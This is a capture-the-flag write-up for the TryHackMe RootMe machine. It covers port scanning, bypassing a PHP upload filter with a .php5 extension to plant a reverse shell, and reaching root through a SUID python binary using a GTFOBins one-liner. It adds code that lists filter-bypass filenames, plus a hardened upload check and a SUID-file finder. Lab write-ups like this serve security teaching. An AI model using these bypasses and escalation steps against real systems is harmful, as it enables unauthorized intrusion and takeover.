TryHackMe | RootMe Write-Up

Omer Gunesacar
Mar 11, 2023


In this write-up, we are going to root the RootMe machine on TryHackMe.

RootMe CTF: https://tryhackme.com/room/rrootme by ReddyyZ

Let’s begin!

Let’s check that the machine is up by pinging it.

ping <MACHINE IP> -c 4

-c 4: stop after sending four echo requests (without it, ping runs until interrupted)

We can infer that this is a Linux machine from the Time to Live (TTL) value in the replies: Linux hosts answer with a default TTL of 64, Windows hosts with 128. Treat it as a heuristic, not proof: every router on the path decrements the TTL by one, so a Linux box a few hops away still shows a value just under 64, and the default can be changed on the host.

Now let’s use nmap to find the open ports, which service is listening on each, the version of that service, and the operating system of the machine.

nmap -p- -T4 <MACHINE IP> -v -sT -sV -O -oN output

  • -p- : scan all TCP ports (1–65535), not just nmap’s default top 1000
  • -T4 : timing template (higher is faster, at the cost of accuracy on unreliable links)
  • -v : increase verbosity (use -vv or more for greater effect)
  • -sT : TCP connect scan (completes the full handshake; works without raw-socket privileges)
  • -sV : probe open ports to determine service and version info
  • -O : OS detection (requires root, since it sends raw packets)
  • -oN output : save the results in normal format to a file called output

Let’s check whether the OpenSSH 7.6p1 that nmap reported has any public exploits by running searchsploit against that version string.

I do not think that this will be helpful to us right now.

Let’s take a look at the website on port 80:

Let’s use gobuster to brute-force directories on the website.

Let’s take a look at /uploads and /panel.

It is fairly straightforward that we’ll use /panel to upload a malicious file and then open it from /uploads. But can we really upload a PHP reverse shell? Let’s see.

I am going to use the php-reverse-shell from pentestmonkey. Open the PHP file and set $ip to your own IP address (the one the target can reach, i.e. your VPN address) and $port to the port you want the shell to connect back to. I used Sublime Text for editing.

Let’s try to upload this php file to website.

PHP is not allowed!

It didn’t like our .php file. Let’s try uploading the same PHP file with a different extension.

From the guru99 PHP introduction (“File extension and Tags”): in order for the server to identify our PHP files and scripts, we must save the file with the “.php” extension. Older PHP file extensions include

  • .phtml
  • .php3
  • .php4
  • .php5
  • .phps

source: What is PHP? Write your first PHP Program (guru99.com)

Let’s try these extensions.

In our case, the .php5 extension worked.

What did I do with those JPEG files? Here’s what I tried to get a shell.

1-I tried to upload a cute dog image and it worked.

2-I changed the extension from .jpeg to .php, but it didn’t execute.

3-I changed the magic number using a hex editor, but that didn’t work either.
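The two results above fit together once you separate the upload filter from the web server’s handler configuration: the filter only refuses names that end in the literal “.php”, while the server decides what to execute purely from the extension it sees on disk, so a JPEG with a .php name is refused and a PHP script with a .php5 name is accepted and then run. The following is an added example, not code from the room or from the author; the denylist it models is an assumption about the /panel check (the real filter is not shown on the page), and the hardened variant is what a fixed upload handler would do instead.

```python
import os
import re

# Assumed stand-in for the /panel check: a denylist of one extension.
# (Assumption: the real RootMe filter is not visible on the page.)
DENYLIST = {".php"}


def naive_is_allowed(filename: str) -> bool:
    """Denylist check: only the literal .php extension is refused."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


# Extensions that PHP handler configurations commonly map to the PHP engine.
# Which of them executes on a given server depends on that server's handler
# config (e.g. Apache's FilesMatch/AddHandler rules), not on the upload filter.
PHP_ALIASES = [".php", ".phtml", ".php3", ".php4", ".php5", ".phps", ".phar"]


def bypass_candidates(stem: str = "shell") -> list:
    """Names the naive denylist accepts but a PHP handler may still execute."""
    names = [stem + ext for ext in PHP_ALIASES]
    # Double extension: some Apache AddHandler setups match .php anywhere
    # in a multi-extension name, so this also gets past the denylist.
    names.append(stem + ".php.jpeg")
    return [n for n in names if naive_is_allowed(n)]


# Hardened check: allowlist of image extensions, a plain single-part
# basename (no path separators, no second dot), and the first bytes
# must match the type the extension claims.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Allowlist + name shape + magic bytes. Returns True only for a
    plainly named image whose content starts with that format's signature."""
    if os.path.basename(filename) != filename:      # reject any path component
        return False
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in ALLOWED or not SAFE_STEM.match(stem):
        return False
    return content.startswith(ALLOWED[ext])


if __name__ == "__main__":
    print("denylist lets through:", bypass_candidates())
    print("hardened, shell.php5:", hardened_is_allowed("shell.php5", b"<?php"))
    print("hardened, dog.jpeg:", hardened_is_allowed("dog.jpeg", b"\xff\xd8\xff\xe0"))
```

Even the hardened check is only half of the fix: the real defence is to store uploads outside the web root or to disable script execution for the /uploads directory, so that nothing in it is ever handed to the PHP engine regardless of its name.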

We got the shell by uploading the PHP reverse shell with a .php5 extension and opening it from /uploads, with a listener waiting on the port we set in the script. What now?

Enumeration!

Let’s use a couple of commands to get information about the machine.

Let’s take a look at the directory layout.

Let’s use find / -iname "user.txt" 2>/dev/null to locate the user.txt file (the redirect hides the permission-denied noise from directories our www-data shell cannot read).

user.txt is at /var/www/user.txt, and the other flag is probably in /root.

Let’s try to Escalate our Privileges.

sudo -l : lists the commands our user may run with sudo, which might let us run something as root.

cat /etc/crontab: maybe there is a scheduled script created by root that we can write to? Nope.

SUID bits: files that have the SUID or SGID bit set run with the privileges of their owner (or group) rather than ours, so a root-owned SUID binary that lets us spawn a shell is a direct path to root.
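On the target this search is one line of shell, find / -perm -4000 -type f 2>/dev/null, but it is worth seeing what that check actually tests. The script below is an added example, not part of the original write-up: it walks a directory tree, reports every regular file whose mode carries the SUID or SGID bit together with its owner uid, and builds a constructed sample tree under a temporary directory so it can be run anywhere without root.

```python
import os
import stat
import tempfile

# Shell equivalent on the target: find / -perm -4000 -type f 2>/dev/null


def find_setid_files(root: str) -> list:
    """Return sorted (path, bits, owner_uid) tuples for regular files under
    `root` with the SUID and/or SGID bit set. Symlinks are not followed and
    unreadable directories are skipped, mirroring find's 2>/dev/null."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:    # the 4000 bit find -perm -4000 tests
                bits.append("suid")
            if st.st_mode & stat.S_ISGID:    # the 2000 bit
                bits.append("sgid")
            if bits:
                found.append((path, "+".join(bits), st.st_uid))
    return sorted(found)


def root_owned(entries: list) -> list:
    """Keep only entries owned by uid 0: these are the ones worth
    checking against GTFOBins, since they run with root's privileges."""
    return [e for e in entries if e[2] == 0]


def demo() -> dict:
    """Constructed sample tree: one SUID file, one SGID file, one plain file.
    Returns {basename: bits} for what find_setid_files reports."""
    d = tempfile.mkdtemp(prefix="setid-demo-")
    specs = {"suid_bin": 0o4755, "sgid_bin": 0o2755, "plain_bin": 0o755}
    for name, mode in specs.items():
        p = os.path.join(d, name)
        with open(p, "wb") as f:
            f.write(b"#!/bin/sh\necho hi\n")
        os.chmod(p, mode)
    return {os.path.basename(p): bits for p, bits, _uid in find_setid_files(d)}


if __name__ == "__main__":
    for path, bits, uid in root_owned(find_setid_files("/")):
        print(f"{bits:9} uid={uid} {path}")
```

Run as a normal user it lists the same binaries the find one-liner would; root_owned narrows that to the ones that actually matter for privilege escalation, which is the list to take to GTFOBins.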

The SUID search turns up a root-owned python binary. Python will give us a hand to gain a shell with root privileges. But how?

Let’s take a look at GTFOBins. Its SUID entry for python spawns /bin/sh with the -p flag, and that flag matters: bash and dash reset the effective UID back to the real UID when they start with the two not matching, so without -p the shell would quietly drop the root privileges the SUID python gave us.

This command will give us a root shell. I hope:

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

And it did:

The root flag is in /root.

I hope this write-up helps those who are interested in cyber security.

Thank you for reading.
